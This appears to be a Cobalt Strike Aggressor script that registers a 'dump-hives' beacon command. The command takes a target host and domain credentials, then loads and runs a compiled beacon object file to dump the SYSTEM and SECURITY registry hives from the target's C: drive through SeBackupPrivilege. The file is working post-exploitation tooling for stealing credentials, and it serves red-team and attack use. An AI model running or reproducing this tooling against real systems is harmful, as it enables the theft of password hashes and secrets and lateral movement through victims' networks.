# $1 = beacon ID
# $2 = target
# $3 = DOMAIN\user
# $4 = password

alias dump-hives {
    local('$handle $data $args $target $domain $user $pass');

    btask($1, "\cBdump-hives-BOF | Berkan ER // B3R-SEC | github.com/erberkan\n");

    if (size(@_) == 4) {

        $target             = $2;
        ($domain, $user)    = split('\\\\', $3);
        $pass               = $4;  

        btask($1, "Create token as $user");
    } else {
        berror($1, "Incorrect usage!");
    }

    $handle = openf(script_resource("dump-hives.o"));
    $data   = readb($handle, -1);
    closef($handle);

    $args = bof_pack($1, "zzzz", $target, $domain, $user, $pass);

    beacon_inline_execute($1, $data, "go", $args);

}

beacon_command_register(
    "dump-hives", 
    "Dump SYSTEM, SYSTEM and SECURITY hives under C:\\ drive, If user has SeBackupPrivilege", 
    "Synopsis: dump-hives [target] [DOMAIN\\user] [password]"
);